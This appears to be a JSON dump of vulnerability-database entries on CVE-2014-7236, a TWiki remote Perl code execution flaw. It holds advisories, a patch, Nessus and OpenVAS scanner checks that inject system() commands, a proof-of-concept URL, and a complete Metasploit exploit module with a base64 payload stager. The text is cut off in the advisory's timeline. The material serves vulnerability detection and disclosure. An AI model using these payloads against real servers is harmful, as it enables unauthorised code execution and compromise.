{"saint": [{"lastseen": "2017-01-10T14:03:40", "bulletinFamily": "exploit", "description": "Added: 03/30/2015 \nCVE: [CVE-2014-7236](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236>) \nBID: [70372](<http://www.securityfocus.com/bid/70372>) \nOSVDB: [112977](<http://www.osvdb.org/112977>) \n\n\n### Background\n\n[TWiki](<http://www.twiki.org/>) is a web-based collaboration platform written in PERL. \n\n### Problem\n\nThe TWiki view script does not properly sanitize the `**debugenableplugins**` parameter before using it. \n\n### Resolution\n\nUpgrade to TWiki-6.0.1 or higher, or apply the hotfix shown in the [TWiki Security Alert](<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236>). \n\n### References\n\n<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236> \n\n\n### Limitations\n\nExploit works on vulnerable TWiki installations that do not require authentication. If the protocol is https, exploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n", "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "SAINT:F03A9A69EC3A1F89903D4B7738E81DBC", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/twiki_view_debugenableplugins", "title": "TWiki View Script debugenableplugins Request Parameter Vulnerability", "type": "saint", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-14T16:58:05", "bulletinFamily": "exploit", "description": "Added: 03/30/2015 \nCVE: [CVE-2014-7236](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236>) \nBID: [70372](<http://www.securityfocus.com/bid/70372>) \nOSVDB: [112977](<http://www.osvdb.org/112977>) \n\n\n### Background\n\n[TWiki](<http://www.twiki.org/>) is a web-based collaboration platform written in PERL. \n\n### Problem\n\nThe TWiki view script does not properly sanitize the `**debugenableplugins**` parameter before using it. 
\n\n### Resolution\n\nUpgrade to TWiki-6.0.1 or higher, or apply the hotfix shown in the [TWiki Security Alert](<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236>). \n\n### References\n\n<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236> \n\n\n### Limitations\n\nExploit works on vulnerable TWiki installations that do not require authentication. If the protocol is https, exploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n", "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "SAINT:DE75E9D372982B283378BE3ED3ABE01E", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/twiki_view_debugenableplugins", "type": "saint", "title": "TWiki View Script debugenableplugins Request Parameter Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "description": "Added: 03/30/2015 \nCVE: [CVE-2014-7236](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236>) \nBID: [70372](<http://www.securityfocus.com/bid/70372>) \nOSVDB: [112977](<http://www.osvdb.org/112977>) \n\n\n### Background\n\n[TWiki](<http://www.twiki.org/>) is a web-based collaboration platform written in PERL. \n\n### Problem\n\nThe TWiki view script does not properly sanitize the `**debugenableplugins**` parameter before using it. \n\n### Resolution\n\nUpgrade to TWiki-6.0.1 or higher, or apply the hotfix shown in the [TWiki Security Alert](<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236>). \n\n### References\n\n<http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236> \n\n\n### Limitations\n\nExploit works on vulnerable TWiki installations that do not require authentication. If the protocol is https, exploit requires the IO::Socket::SSL Perl module to be installed on the SAINTexploit host. 
This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n", "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "SAINT:3A49E540B9026A5C1EB0F5D89CA45A9F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/twiki_view_debugenableplugins", "type": "saint", "title": "TWiki View Script debugenableplugins Request Parameter Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-11-01T02:37:12", "bulletinFamily": "scanner", "description": "TWiki developers report :\n\nThe debugenableplugins request parameter allows arbitrary Perl code\nexecution.\n\nUsing an HTTP GET request towards a TWiki server, add a specially\ncrafted debugenableplugins request parameter to TWiki", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_21CE1840610711E49E840022156E8794.NASL", "href": "https://www.tenable.com/plugins/nessus/78816", "published": "2014-11-03T00:00:00", "title": "FreeBSD : twiki -- remote Perl code execution (21ce1840-6107-11e4-9e84-0022156e8794)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78816);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/02/07 9:34:55\");\n\n script_cve_id(\"CVE-2014-7236\");\n\n script_name(english:\"FreeBSD : twiki -- remote Perl code execution (21ce1840-6107-11e4-9e84-0022156e8794)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"TWiki developers report :\n\nThe debugenableplugins request parameter allows arbitrary Perl code\nexecution.\n\nUsing an HTTP GET request towards a TWiki server, add a specially\ncrafted debugenableplugins request parameter to TWiki's view script\n(typically port 80/TCP). 
Prior authentication may or may not be\nnecessary.\n\nA remote attacker can execute arbitrary Perl code to view and modify\nany file the webserver user has access to.\n\nExample:\nhttp://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupR\nestorePlugin%3bprint('Content-Type:text/html\\r\\n\\r\\nVulnerable!')%3bex\nit\n\nThe TWiki site is vulnerable if you see a page with text\n'Vulnerable!'.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236\"\n );\n # https://vuxml.freebsd.org/freebsd/21ce1840-6107-11e4-9e84-0022156e8794.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e14ddd1d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki debugenableplugins RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki Debugenableplugins Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:twiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"twiki<5.1.4_1,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-03T12:30:20", "bulletinFamily": "scanner", "description": "The version of TWiki installed on the remote host is affected by a\nremote code execution vulnerability due to a failure to properly\nsanitize user-supplied input to the ", "modified": "2019-11-02T00:00:00", "id": "TWIKI_DEBUGENABLEPLUGINS_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/82898", "published": "2015-04-20T00:00:00", "title": "TWiki 'debugenableplugins' Parameter RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82898);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/08/01 17:36:12\");\n\n script_cve_id(\"CVE-2014-7236\");\n script_bugtraq_id(70372);\n\n script_name(english:\"TWiki 'debugenableplugins' Parameter RCE\");\n script_summary(english:\"Attempts to run a command using TWiki.\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"The remote web server hosts a CGI script that is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of TWiki installed on the remote host is affected by a\nremote code execution vulnerability due to a failure to properly\nsanitize user-supplied input to the 'debugenableplugins' parameter\nupon submission to the 'view' script. A remote, unauthenticated \nattacker can exploit this issue to execute arbitrary Perl code subject\nto the privileges of the web server user id.\n\nNote that the application is reportedly also affected by a file upload\nvulnerability when installed on Windows hosts; however, Nessus has not\ntested for this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01\");\n script_set_attribute(attribute:\"see_also\", value:\"http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to TWiki version 6.0.1 or later. 
Alternatively, apply the\nhotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki debugenableplugins RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki Debugenableplugins Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:twiki:twiki\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"twiki_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"installed_sw/TWiki\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"TWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nif (\"cgi-bin\" >!< dir)\n{\n dir = ereg_replace(pattern:\"(/[^/]+/).*\", string:dir, replace:\"\\1\");\n dir = dir + \"bin/\";\n}\nelse\n dir = dir - \"view\";\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask|IP(v(4|6)?)? 
Address\";\n\nforeach cmd (cmds)\n{\n\n url = \"view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint\"+\n '(\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\")%3bsystem('+\"'\"+cmd+\"')%3bexit\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : dir + url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:cmd_pats[cmd], string:res[2]))\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (!vuln) audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n cmd : cmd,\n line_limit : 2,\n request : make_list(build_url(qs:dir+url, port:port)),\n output : chomp(res[2])\n);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "bulletinFamily": "exploit", "description": "Remote code execution vulnerability in TWiki debugenableplugins\n\nVulnerability Type: Remote Command Execution", "modified": "2015-09-01T00:00:00", "published": "2015-09-01T00:00:00", "id": "E-476", "href": "", "type": "dsquare", "title": "TWiki debugenableplugins RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-01-07T12:18:03", "bulletinFamily": "scanner", "description": "TWiki is prone to remote code-execution vulnerability.", "modified": "2019-01-07T00:00:00", "published": "2014-10-27T00:00:00", "id": "OPENVAS:1361412562310105097", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105097", "title": "TWiki 'debugenableplugins' Parameter Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_twiki_70372.nasl 12952 2019-01-07 06:54:36Z ckuersteiner $\n#\n# TWiki 'debugenableplugins' Parameter Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright 
(c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:twiki:twiki\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105097\");\n script_bugtraq_id(70372);\n script_cve_id(\"CVE-2014-7236\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_version(\"$Revision: 12952 $\");\n\n script_name(\"TWiki 'debugenableplugins' Parameter Remote Code Execution Vulnerability\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-01-07 07:54:36 +0100 (Mon, 07 Jan 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-27 12:57:24 +0100 (Mon, 27 Oct 2014)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_twiki_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"twiki/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/70372\");\n script_xref(name:\"URL\", value:\"http://twiki.org/\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this 
issue\n to execute arbitrary code in the context of the webserver user.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a HTTP GET request and check the response.\");\n\n script_tag(name:\"insight\", value:\"It is possible to execute arbitrary Perl code by adding a\n'debugenableplugins=' parameter with a specially crafted value.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n script_tag(name:\"summary\", value:\"TWiki is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"TWiki 6.0.0, 5.1.0-5.1.4, 5.0.0-5.0.2, 4.3.0-4.3.2, 4.2.0-4.2.4, 4.1.0-4.1.2,\n4.0.0-4.0.5.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) dir = '';\n\ncmds = exploit_commands();\n\nforeach cmd ( keys( cmds ) ) {\n ex = '?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\")%3bprint(system(\"' +\n cmds[ cmd ] + '\"))%3bexit';\n url = dir + '/view/Main/WebHome' + ex;\n\n if( http_vuln_check( port:port, url:url, pattern:cmd, check_header:TRUE ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-14T13:53:16", "bulletinFamily": "exploit", "description": "TWiki versions 4.0.x through 6.0.0 contain a vulnerability in the Debug functionality. 
The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution.", "modified": "2015-03-19T00:00:00", "published": "2015-03-19T00:00:00", "id": "1337DAY-ID-23393", "href": "https://0day.today/exploit/description/23393", "type": "zdt", "title": "TWiki Debugenableplugins Remote Code Execution Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'TWiki Debugenableplugins Remote Code Execution',\r\n 'Description' => %q{\r\n TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.\r\n The value of the debugenableplugins parameter is used without proper sanitization\r\n in an Perl eval statement which allows remote code execution\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'h0ng10', # Metasploit Module\r\n \r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-7236'],\r\n [ 'OSVDB', '112977'],\r\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 09 2014'))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"TWiki path\", '/do/view/Main/WebHome' ]),\r\n OptString.new('PLUGIN', [true, \"A existing TWiki Plugin\", 'BackupRestorePlugin'])\r\n ], self.class)\r\n 
end\r\n \r\n \r\n def send_code(perl_code)\r\n uri = target_uri.path\r\n data = \"debugenableplugins=#{datastore['PLUGIN']}%3b\" + CGI.escape(perl_code) + \"%3bexit\"\r\n \r\n res = send_request_cgi!({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'data' => data\r\n })\r\n \r\n return res\r\n end\r\n \r\n \r\n def check\r\n rand_1 = rand_text_alpha(5)\r\n rand_2 = rand_text_alpha(5)\r\n \r\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n#{rand_1}\\\".\\\"#{rand_2}\\\")\"\r\n res = send_code(code)\r\n \r\n if res and res.code == 200\r\n return CheckCode::Vulnerable if res.body == rand_1 + rand_2\r\n end\r\n CheckCode::Unknown\r\n end\r\n \r\n \r\n def exploit\r\n code = \"print(\\\"Content-Type:text/html\\\\r\\\\n\\\\r\\\\n\\\");\"\r\n code += \"require('MIME/Base64.pm');MIME::Base64->import();\"\r\n code += \"system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit\"\r\n res = send_code(code)\r\n handler\r\n \r\n end\r\n \r\nend\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23393"}, {"lastseen": "2018-01-10T05:13:47", "bulletinFamily": "exploit", "description": "The debugenableplugins request parameter in Twiki versions 4.x, 5.x, and 6.0.0 allows arbitrary Perl code execution and suffer from a file upload bypass vulnerability.", "modified": "2014-10-10T00:00:00", "published": "2014-10-10T00:00:00", "id": "1337DAY-ID-22741", "href": "https://0day.today/exploit/description/22741", "type": "zdt", "title": "Twiki Perl 4.x, 5.x, 6.x Upload Bypass / Code Execution Vulnerabilities", "sourceData": "This is an advisory for TWiki administrators: The debugenableplugins request parameter allows arbitrary Perl code execution. Attaching a specially named file allows remote upload of an Apache configuration file. 
This applies to native TWiki installations on Windows; the TWiki-VM (virtual machine) running in a Windows server environment is not affected.\r\n\r\nTWiki ( http://twiki.org ) is an Open Source Enterprise Wiki and Web Application Platform used by millions of people.\r\n\r\n * Vulnerable Software Version\r\n * Attack Vectors\r\n * Impact\r\n * Severity Level\r\n * MITRE Name for this Vulnerability\r\n * Details\r\n * Countermeasures\r\n * Hotfix for TWiki Production Release 6.0.0\r\n * Hotfix for Older Affected TWiki Releases\r\n * Verify Hotfix\r\n * Authors and Credits\r\n * Action Plan with Timeline\r\n * External Links\r\n * Feedback\r\n\r\n---++ Vulnerable Software Version\r\n\r\n * TWiki-6.0.0 (TWikiRelease06x00x00)\r\n * TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04)\r\n * TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02)\r\n * TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02)\r\n * TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04)\r\n * TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02)\r\n * TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05)\r\n\r\n---++ Attack Vectors\r\n\r\nUsing an HTTP GET request towards a TWiki server, add a specially crafted 'debugenableplugins' request parameter to TWiki's view script (typically port 80/TCP). 
Prior authentication may or may not be necessary.\r\n\r\n---++ Impact\r\n\r\nA remote attacker can execute arbitrary Perl code to view and modify any file the webserver user has access to.\r\n\r\n---++ Severity Level\r\n\r\nThe TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess [1] and assigned the following severity level:\r\n\r\n * Severity 1 issue: The web server can be compromised \r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7236 [7] to this vulnerability. \r\n\r\n---++ Details\r\n\r\nIt is possible to execute arbitrary Perl code by adding a =debugenableplugins= parameter with a specially crafted value. Example:\r\n\r\nhttp://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit\r\n\r\nThe TWiki site is vulnerable if you see a page with text \"Vulnerable!\".\r\n\r\n__Background:__\r\n\r\nTWiki allows enabling specific plugins for debug purposes using a 'debugenableplugins' parameter that lists the plugins to enable. In order to support this dynamic loading of plugins, TWiki inserts the plugin name into the following Perl =eval= statement without sanitizing the plugin name:\r\n<verbatim>\r\nmy $p = $this->{module};\r\neval \"use $p;\";\r\n</verbatim>\r\n\r\n---++ Countermeasures\r\n\r\n * Apply hotfix (see patch below).\r\n * Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2]\r\n\r\n---++ Hotfix for TWiki Production Release 6.0.0\r\n\r\nApply the patch listed in the TWiki bug item at TWikibug:Item7558 [8]. The patch is also listed here, but due to whitespace changes in e-mail it is not recommended to use below patch.\r\n\r\nNOTE: In case you use a Perl accelerator make sure to clear the script cache. 
For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache.\r\n\r\nAffected file: twiki/lib/TWiki/Plugins.pm\r\n\r\nPatch to sanitize the 'debugenableplugins' parameter:\r\n\r\n=======( 8>< CUT )===============================================\r\n--- TWiki/Plugins.pm.save1 2014-01-09 02:10:56.000000000 -0500\r\n+++ TWiki/Plugins.pm 2014-10-01 20:30:36.000000000 -0400\r\n@@ -186,8 +186,11 @@\r\n \r\n unless( $allDisabled ) {\r\n if ( $query && defined( $query->param( 'debugenableplugins' ))) {\r\n- @pluginList = split( /[,\\s]+/,\r\n- $query->param( 'debugenableplugins' ));\r\n+ @pluginList =\r\n+ grep { /Plugin$/ }\r\n+ map { s/[^a-zA-Z0-9]//go; $_ } # Item7558: Sanitize parameter\r\n+ split( /[,\\s]+/, $query->param( 'debugenableplugins' ));\r\n+\r\n } else {\r\n if( $TWiki::cfg{PluginsOrder} ) {\r\n foreach my $plugin( split( /[,\\s]+/,\r\n=======( 8>< CUT )===============================================\r\n\r\n---++ Hotfix for Older Affected TWiki Releases\r\n\r\nApply above patch (line numbers may vary).\r\n\r\n---++ Verify Hotfix\r\n\r\nTo verify the patch add the following parameter to any TWiki topic:\r\n\r\n?debugenableplugins=BackupRestorePlugin%3bprint(\"Content-Type:text/html\\r\\n\\r\\nVulnerable!\")%3bexit\r\n\r\nThe site is vulnerable if a page is returned with text \"Vulnerable!\"\r\n\r\n---++ Authors and Credits\r\n\r\n * Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue to the [email\u00a0protected] list\r\n * PeterThoeny for creating the fix, patch and advisory\r\n * HideyoImazu for creating the TWiki-6.0.1 production release [2]\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4]\r\n * 2014-10-01 - developer verifies issue - PeterThoeny\r\n * 2014-10-01 - developer fixes code - PeterThoeny\r\n * 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu\r\n * 
